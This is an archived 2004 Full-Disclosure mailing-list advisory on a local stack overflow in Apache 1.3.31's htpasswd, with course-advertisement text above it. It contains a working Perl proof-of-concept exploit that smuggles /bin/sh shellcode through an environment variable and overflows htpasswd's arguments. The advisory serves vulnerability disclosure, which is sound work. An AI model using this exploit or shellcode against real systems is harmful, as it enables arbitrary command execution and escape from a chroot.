Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] FlowSecurity.org: Local Stack Overflow on htpasswd apa

from [Luiz Fernando] Network Security [Permanent Link]
Subject: [Full-Disclosure] FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory.
Date: Thu, 16 Sep 2004 13:23:03 -0300 
**********************************************************************************************
Flow Security                                                         
                                                                      
foxtrot@flowsecurity.org
September 16nd,                                                       
                                                            2004 Luiz
Fernando Camargo
-----------------------------------------------------------------------------------------------------------------------------

Package Name: Apache htpasswd 
Vendor URL: http://www.apache.org 
Vendor Notified: Two months ago, but we got no answer. 
Date: 2004-09-16 
ID: FST-#0001 
Affected Version: 1.3.31 and prior versions. 
Risk: Execute arbitrary command, maybe evade apache chroot() 

**********************************************************************************************


[01] Package Description 
[02] The problem 
[03] Possibilities 
[04] Solution 
[05] Proof of Concept 
[06] Credits 


[01] Short Description 

Since htpasswd is part of apache software, here we got the apache description. 
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.

[02] The problem 

In apache/src/support/htpasswd.c were found lots of problems with strcpy. 
Unchecked buffers with user and passwd variables may let an attacker
to take advantage of it.


[03] Possibilities 

htpasswd is not setuid root by default. And it doesn't have any sense to 
do it yourself. So you can't gain root by exploiting these bugs directly. 

However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.

[04] Solution 

Take a good look in strcpy functions and maybe change it for strncpy function. 


[05] Proof of Concept 

-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------

#!/usr/bin/perl 
# Proof Of Concept exploit for htpasswd of Apache. 
# Read the advisory for more information. 
# - Luiz Fernando Camargo 
# - foxtrot@flowsecurity.org 
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". 
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 

$target = "/usr/local/apache/bin/htpasswd"; 
$retaddr = 0xbffffffa - length($shellcode) - length($target); 

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 

local($ENV{'XXX'}) = $shellcode; 
$newret = pack('l', $retaddr); 
$buffer = "A" x 272; 
$buffer .= $newret x 4; 
$buffer .= " "; 
$buffer .= "B" x 290; 

exec("$target -nb $buffer"); 




-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------

[06] Credits 

Jefferson Cachinel 
Thyago Silva 
Rodrigo Rubira Branco 
Adriano Lima 
Jardir ph0enix 

cheers,
Luiz Fernando Camargo
www.flowsecurity.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory., Luiz Fernando <=
Previous by Date:  RE: [Full-Disclosure] Vulnerability in IBM Windows XP: default hi dden Administrator account allows local Administrator access, Stephen Agar
Next by Date:  [Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access, Harrison Gladden
Previous by Thread:  RE: [Full-Disclosure] Vulnerability in IBM Windows XP: default hi dden Administrator account allows local Administrator access, Stephen Agar
Next by Thread:  [Full-Disclosure] [exploitwatch.org] ALERT: Windows XP JPEG Buffer Overflow POC Exploit, admin
Indexes:  [Date] [Thread] [Top] [All Lists]